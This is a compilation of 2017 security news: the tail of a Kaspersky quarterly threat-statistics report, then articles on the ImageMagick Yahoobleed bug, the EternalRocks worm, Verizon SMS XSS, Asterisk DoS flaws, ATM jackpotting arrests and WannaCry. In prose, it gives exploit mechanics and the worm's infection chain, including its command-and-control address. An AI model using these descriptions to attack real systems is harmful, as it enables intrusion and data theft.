CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remain the most popular vulnerabilities in the first quarter. Of note were also vulnerabilities in the Microsoft Edge Chakra engine, published in open access in early 2017. In addition to the detailed description of vulnerabilities, the research included a ready-to-use Proof of Concept, which shortly after the publication was integrated in the Sundown exploit kit from which it moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, while patches for them were released as far back as in November along with the MS16-129 update, so they have not become widely spread and are now almost out of use.

IT threat evolution Q1 2017. Statistics

Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, especially popular were campaigns involving mass mailings of infected documents – to distribute them, Microsoft Office exploits were used. Although the share of attacked office package users has not changed much, the same users were attacked several times – on average, one attacked user received 3 malicious documents over the quarter.

The general trend is towards the increase in the share of social engineering when delivering malware to the computer of a potential victim. Campaigns involving distribution of infected messages are always based on forcing a user to perform certain actions: unpack a file from the password-protected archive, issue a permission to execute macros from the document, etc. This method is currently beginning to be applied in exploits for browsers. Magnitude, for example, offers the Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of antivirus update for Microsoft Defender. Some spam campaigns are based on imitating the Google Chrome update page. We believe that this trend will continue in the future – such campaigns are easier to maintain and implement, and their level of “penetration” is constantly growing.

Online threats (Web-based attacks)

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 the statistics include malicious programs for ATMs and POS terminals but does not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.

IT threat evolution Q1 2017. Statistics

Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

IT threat evolution Q1 2017. Statistics

Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users **
1 Germany 1.70
2 China 1.37
3 Libya 1.12
4 Kazakhstan 1.02
5 Palestine 0.92
6 Togo 0.91
7 Tunisia 0.89
8 Armenia 0.89
9 Venezuela 0.88
10 Taiwan 0.87
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

As for the contribution of the other European countries in the Q1 rating, for example, Spain (0.24%) was on 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 45.93
2 Trojan.Win32.Nymaim 29.70
3 Trojan.Win32.Neurevt 3.31
4 Trojan-Banker.Win32.Gozi 3.15
5 Trojan-Spy.Win32.SpyEyes 2.71
6 Backdoor.Win32.ZAccess 2.11
7 Backdoor.Win32.Shiz 1.67
8 Trojan.Multi.Capper 1.67
9 Trojan.Win32.Tinba 1.00
10 Trojan.Win32.Shifu 1.00
*The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

As in the last year, in Q1 2017, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of malware belonging to this Trojan family were downloaders, which blocked the infected machine with the help of downloaded programs unique for each country. Later, new modifications of the Trojan.Win32.Nymaim family malware were discovered. They included a fragment of Gozi used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) was on 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C ++. It uses rootkit technologies to conceal its presence in the system, injects its own code into all running processes, blocks the work of some anti-virus programs, and can monitor and block installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55, 679 new modifications were detected in Q1 2017.

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240, 799 unique KSN users were attacked by cryptors.

IT threat evolution Q1 2017. Statistics

Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half as much as that of the fourth quarter of 2016, but one should not consider it a receding threat. It is most likely that this difference is related to the methodology while the actual number of incidents is higher: the statistics only reflect the results of signature-based and heuristic detection, whereas most of the Trojan ransomware is detected by Kaspersky Lab products using behavioral methods and issuing a generic verdict that does not allow distinguishing types of malware.

The geography of attacks

IT threat evolution Q1 2017. Statistics

Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors **
1 Italy 1.87%
2 Brazil 1.07%
3 Japan 0.99%
4 Vietnam 0.74%
5 Netherlands 0.73%
6 Cambodia 0.70%
7 Uganda 0.66%
8 Philippines 0.65%
9 Venezuela 0.63%
10 Nigeria 0.60%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, now took the lead the Q1 ranking (1.87%). Second came Brazil (1.07%), the newcomer to the Top 10. This correlates with our observations that indicate an increase in the number Trojan ransomware targeting victims in Brazil. One of the examples of such malicious software was Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains at the top of the rating.

Top 10 most widespread cryptor families

Name Verdict* % of attacked users**
1 Cerber Trojan-Ransom.Win32. Zerber 18.04%
2 Spora Trojan-Ransom.Win32.Spora 7.59%
3 Locky Trojan-Ransom.Win32.Locky 7.35%
4 Sage Trojan-Ransom.Win32.SageCrypt 3.44%
5 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.20%
6 Shade Trojan-Ransom.Win32.Shade 2.82%
7 (generic verdict) Trojan-Ransom.Win32.Gen 2.37%
8 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.30%
9 CryptoWall Trojan-Ransom.Win32.Cryptodef 2.25%
10 (generic verdict) Trojan-Ransom.Win32.Snocry 2.16%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

The Trojan Cerber (18.04%) was the most widespread in the number of attacked users in the first quarter of 2017. It is no wonder, considering a huge number of this cryptor’s modifications and its active distribution by fraudsters.

Spora (7.59%) was on the second place. This new Trojan was first discovered in January 2017 and at the “dawn of its career” only attacked Russian-speaking victims. However, a few weeks after its detection Spora spread around the world and by the end of the first quarter entered the top three most popular cryptors. The third position was occupied by Locky (7.35%) which appeared about a year and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The rest places went to our “old acquaintances”, which appeared in the reports for the previous quarters.

Of special note is the finding of the quarter the cryptor PetrWrap, which is used by cybercriminals for targeted attacks on organizations. Statistics show that this type of attacks is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479, 528, 279 attacks launched from web resources located in 191 countries around the world. 79, 209, 775 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which used to top this rating for several quarters in a row, dropped to second place, although the share of this country remained almost unchanged from the 2016’s figures. Germany (9%) rounded off the Top3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Algeria 37.67
2 Belarus 33.61
3 Tunisia 32.04
4 Ukraine 31.98
5 Kazakhstan 29.96
6 Azerbaijan 29.95
7 Albania 29.80
8 Bangladesh 29.51
9 Qatar 29,41
10 Armenia 29.02
11 Greece 28.21
12 Moldova 27.46
13 Venezuela 27.37
14 Kyrgyzstan 27.02
15 Vietnam 26.87
16 Russia 26.67
17 Morocco 25.65
18 Sri Lanka 25.42
19 Brazil 25.10
20 Serbia 24.18
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

IT threat evolution Q1 2017. Statistics

Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan 9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab’s file antivirus detected 174, 989, 956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Yemen 54.84
2 Afghanistan 54.27
3 Uzbekistan 53.80
4 Tajikistan 51.32
5 Ethiopia 50.87
6 Djibouti 50.03
7 Algeria 49.38
8 Vietnam 49.15
9 Turkmenistan 48.39
10 Rwanda 47.57
11 Mongolia 47.25
12 Somalia 46.96
13 Syria 46.96
14 Bangladesh 46.64
15 Iraq 46.59
16 Sudan 46.35
17 Nepal 46.19
18 Kazakhstan 46.00
19 Laos 45.39
20 Belarus 43.45
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 23.63% of computers globally faced at least one Malware-class local threat during the third quarter. Russia’s contribution to this rating accounted for 30.51%.

IT threat evolution Q1 2017. Statistics

The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).


18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server
23.5.2017 thehackernews Hacking
After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages.
This popular image-processing library made headline last year with the discovery of the then-zero-day vulnerability, dubbed ImageTragick, which allowed hackers to execute malicious code on a Web server by uploading a maliciously-crafted image.
Now, just last week, security researcher Chris Evans demonstrated an 18-byte exploit to the public that could be used to cause Yahoo servers to leak other users' private Yahoo! Mail image attachments.
'Yahoobleed' Bug Leaks Images From Server Memory

The exploit abuses a security vulnerability in the ImageMagick library, which Evans dubbed "Yahoobleed #1" (YB1) because the flaw caused the service to bleed contents stored in server memory.
The vulnerability actually exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format.
To exploit the vulnerability, all an attacker need to do is create a maliciously crafted RLE image, and send it to the victim's email address, and then create a loop of empty RLE protocol commands, prompting the leakage of information.
To show how it is possible to compromise a Yahoo email account, Evans, as a proof-of-concept (PoC) demonstration, created a malicious image containing 18-byte exploit code and emailed it as an email attachment to himself.
Once the attachment reached the Yahoo's email servers, ImageMagick processed the image to generate thumbnails and previews, but due to the execution of Evans' exploit code, the library generated a corrupt image preview for the image attachment.
Once this image attachment is clicked, it launched the image preview pane, causing the service to display portions of images that were still present in the server's memory, instead of the original image.
"The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content," Evans said.
Unlike Heartbleed and Cloudbleed that were due to out-of-bounds server side memory content leaks, Evans said Yahoobleed makes use of uninitialized or previously freed, memory content.
"The previous bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory," Evans said. "An uninitialized image decode buffer is used as the basis for an image rendered back to the client."
"This leaks server-side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks."
Yahoo Retires 'Buggy' ImageMagick Library
After Evans had submitted his 18-byte exploit code to Yahoo, the company decided to retire the ImageMagick library altogether, rather than fixing the issue.
Evans also warned of another version of Yahoobleed, dubbed Yahoobleed2, which was the due to Yahoo's failure to install a critical patch released in January 2015. He said the flaws combined could allow attackers to obtain browser cookies, authentication tokens, and private images belonging to Yahoo Mail users.
Evans was awarded a bug bounty payment of $14,000 -- $778 per byte for his exploit code -- by the tech giant, who decided to double the bounty to $28,000 after knowing Evans intention to donated his reward to a charity.
After Yahoo has been aware of the issue, Evans reported the vulnerability to the ImageMagick team, who released ImageMagick version 7.0.5-1 two months ago with a fix for the issue.
So, Other widely used Web services using the ImageMagick library are likely still vulnerable to the bug and are advised to apply the patches as soon as possible.


Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem

23.5.2017 securityweek Security
ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product.

The flaw itself, discovered by researcher Chris Evans, was fixed by ImageMagick two months ago. Last week, however, he blogged about his discovery of its persistence at Yahoo. For Evans, it is symptomatic of a wider issue: vendor (ImageMagick) and consumer (in this case Yahoo) responsibility for upstream fixes.

ImageMagick (using his own fix) fixed the problem. Could or should it have done more to ensure that its consumers also applied that fix? Yahoo is (or was) a consumer. Could it or should it have done more to apply upstream fixes?

A solution, suggests Evans, is, "Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities."

The vulnerability, exploited by Evans on Yahoo, provided "a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers." It was present in the RLE (Utah Raster Toolkit Run Length Encoded) image format. An attacker, writes Evans, "could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode."

In his own POC he attached an 18-byte exploit file as a Yahoo! Mail attachment, sent it to himself and clicked on the image in the received mail to launch the image preview pane. "The resulting JPEG image served to my browser," he writes, "is based on uninitialized, or previously freed, memory content."

He reported the problem to Yahoo, and was pleased with Yahoo's response. It was fixed well within Yahoo's self-imposed 90-day deadline, and, he says, the communication was excellent. Compare this to his comments on communication with Box: "communications were painful, as if they were filtered through a gaggle of PR representatives and an encumbrance of lawyers."

The fix itself was simple and complete: Yahoo retired ImageMagick.

Despite its problems over the last few years, Yahoo has come a long way with improving its vulnerability response approach. In 2013, High-Tech Bridge (HTB) found numerous XSS flaws in Yahoo servers. "Each of the discovered vulnerabilities," it said at the time, "allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it."

The HTB researcher was offered a $12-50 Yahoo store voucher for each of the flaws. This time, however, Evans as offered a total of $14,000 for this and a separate issue yet to be documented. When Evans suggested donating it to charity, Yahoo doubled the charitable award to $28,000.

SecurityWeek has asked Yahoo for a comment on the issue, but has not yet received a reply.


Expert founds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered the EternalRocks after it infected his SMB honeypot, he called the malware ‘DoomsDayWorm.’

Follow
Miroslav Stampar @stamparm
If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95
3:44 AM - 18 May 2017
8 8 Retweets 9 9 likes
Twitter Ads info & Privacy
Stampar discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.


Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)
5:28 PM - 17 May 2017
73 73 Retweets 87 87 likes
Twitter Ads info & Privacy
Follow
Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_
2:43 PM - 18 May 2017
Photo published for stamparm/EternalRocks
stamparm/EternalRocks
Contribute to EternalRocks development by creating an account on GitHub.
github.com
137 137 Retweets 136 136 likes
Twitter Ads info & Privacy
Unlike the WannaCry Ransomware that leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks exploits seven exploits leaked by Shadow Brokers and its code doesn’t include a kill-switch.

EternalRocks was developed to avoid detection and to remain undetectable on the target system, it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

EternalRocks

Giving a close look at the list we can find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

The DoublePulsar is the exploit used by malware to implement network worm capabilities, while the SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems hacking open SMB ports exposed on the Internet.

The EternalRocks works in two stages:

During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.

After 24 hours, the second stage starts, the malware delays its action in the attempt to avoid sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages)TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.“


Europol arrested 27 for jackpotting attacks on ATM across the Europe
23.5.2017 securityweek CyberCrime

27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.
Europol has arrested 27 people accused of being involved in a series of successful black box attacks against ATMs across Europe. Since 2016, these attacks have resulted in more than €45 million in losses.“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states the Europol.“Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017. There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”First attacks were observed in 2015, but the technique was widely adopted by crooks since 2016.
“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”

The technique is very effective, it has been estimated that crooks have stolen €45 million using it since 2016.

The attack method was first reported by the notorious expert Barnaby Jack in 2010, the researcher coined the term jackpotting during the 2010 Black Hat conference.

The brute-force black box attack against an ATM starts by punching a hole into the machine’s casing, then the crooks connect a laptop to the exposed cables or ports and use it to issue commands to the ATM to dispense money.

jackpotting ATM attacks

The arrests were part of a still ongoing Europol operation conducted with law enforcement of numerous states in Europe. Below the details of the arrests:

Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.

The crooks that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.

Let me suggest to read an interesting post that was written by the security expert Brian Krebs that is titled “Thieves Jackpot ATMs With ‘Black Box’ Attack” that describes this kind of attacks.


Critical DoS Flaws Patched in Asterisk Framework

23.5.2017 securityweek Vulnerebility
Updates released on Friday for the Asterisk communications framework address three critical denial-of-service (DoS) vulnerabilities discovered by Sandro Gauci, a penetration tester and researcher who specializes in VoIP and communications systems.

Asterisk, considered the world’s most popular open source communications framework, is used by government agencies, carriers and other businesses, including most Fortune 1000 companies. According to its developers, more than one million IP PBX systems, VoIP gateways, conference servers and other solutions rely on Asterisk.

Gauci discovered in April that the project is affected by three potentially serious vulnerabilities that can be exploited to cause the system to crash. Separate advisories have been published by Asterisk developers for each of the flaws.

The vulnerabilities affect all versions of Asterisk 13, 14 and Certified Asterisk 13.13. The issues have been addressed with the release of versions 13.15.1, 14.4.1 and 13.13-cert4.

One of the security holes can be exploited by a remote attacker to cause Asterisk to exhaust all available memory by sending a specially crafted Signalling Connection Control Part (SCCP) packet. Removing or disabling support for the SCCP protocol prevents potential attacks.

“A remote memory exhaustion can be triggered by sending an SCCP packet to Asterisk system with ‘chan_skinny’ enabled that is larger than the length of the SCCP header but smaller than the packet length specified in the header. The loop that reads the rest of the packet doesn’t detect that the call to read() returned end-of-file before the expected number of bytes and continues infinitely. The ‘partial data’ message logging in that tight loop causes Asterisk to exhaust all available memory,” Asterisk developers wrote in their advisory.

The other two vulnerabilities found by Gauci affect PJSIP, an open source multimedia communication library that implements SIP (Session Initiation Protocol) and other protocols. The flaws can be exploited remotely to cause a crash by sending specially crafted SIP packets.

The latest Asterisk releases include a version of PJSIP that addresses these vulnerabilities. However, other projects using the PJSIP library are vulnerable as well, and they will need to obtain upstream patches to protect their users against attacks.


EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools included in the network worm include the EternalBlue, EternalChampion, EternalRomance, and EternalSynergy exploits, along with the DoublePulsar backdoor and the Architouch, and Smbtouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.


Verizon Messages App Allowed XSS Attacks Over SMS

23.5.2017 securityweek Mobil
Until a few months ago, Verizon’s Messages service was affected by a vulnerability that could have easily been exploited to launch cross-site scripting (XSS) attacks using SMS messages.

Verizon Messages (Message+) is a text and multimedia messaging service that allows users to send and receive messages across multiple types of devices, including mobile and desktop, without interruption.

Researcher Randy Westergren analyzed the application’s SMS feature and after sending some URLs to a test account to see how each type of link is rendered, he noticed that adding single quotation marks to a URL allowed him to break out of the HREF attribute and execute arbitrary JavaScript code.

According to the expert, an attacker simply had to send a specially crafted SMS to the targeted user and they could have taken complete control of the victim’s session. Once the user clicked on the malicious message, the attacker could have taken over any functionality, including to send SMSs on behalf of the victim or intercept messages.

The researcher sent his proof-of-concept (PoC) code along with a video and screenshots to Verizon in mid-November 2016. The flaw was resolved by the telecoms giant within a few weeks, but its details were disclosed only on Sunday.

The vendor addressed the vulnerability using the DOM API, which is the fix suggested by Westergren.

This was not the first time the researcher had found a potentially serious flaw in a Verizon service. In January 2015, Westergren disclosed a vulnerability in Verizon’s FiOS web service that could have been exploited to hijack email accounts.

Last year, the expert discovered a critical security hole in Verizon’s webmail service that could have been leveraged by hackers to silently forward a user’s emails to an arbitrary address.


Windows 7 Most Hit by WannaCry Ransomware

23.5.2017 securityweek Ransomware
 Most of the computers affected by the WannaCry ransomware outbreak were running Windows 7, security researchers have revealed.

Initially, the malware was believed to have hit mostly computers running Windows XP, mainly because of its attack vector – exploiting a Server Message Block (SMB) version 1 vulnerability. According to a tweet from Kaspersky Lab’s director of Global Research and Analysis Team Costin Raiu, however, the number of Windows XP infections was insignificant.

Windows 7 x64 machines were hit the most, accounting for 60.35% of infections, with Windows 7 x86 coming in second, at 31.72%, the researcher also revealed. These two Windows 7 versions, along with Windows 7 Home x64 and x86 editions, accounted for around 98% of all WannaCry infections, it seems.

Photo published for Over 98% of All WannaCry Victims Were Using Windows 7
Costin Raiu ✔ @craiu
#WannaCry infection distribution by the Windows version. Worst hit - Windows 7 x64. The Windows XP count is insignificant.
3:40 PM - 19 May 2017
641 641 Retweets 402 402 likes
Twitter Ads info & Privacy

WannaCry made a name for itself after researchers discovered it had a worm component abusing the NSA-linked EternalBlue and DoublePulsar exploits to automatically spread to other vulnerable machines. The exploit was said to target all Windows versions from XP to 8.1 (Windows Server 2003 & 2008 as well), but the worm is now said to be reliable only when hitting Windows 7.

Actual infection numbers aren’t out yet, but researchers estimate that around 420,000 machines have been hit by the ransomware to date. Because a researcher registered a kill-switch domain soon after the outbreak started (upon infection, the malware would beacon to a hardcoded domain and terminate its process when receiving a response), only some of these machines ended up infected with WannaCry.

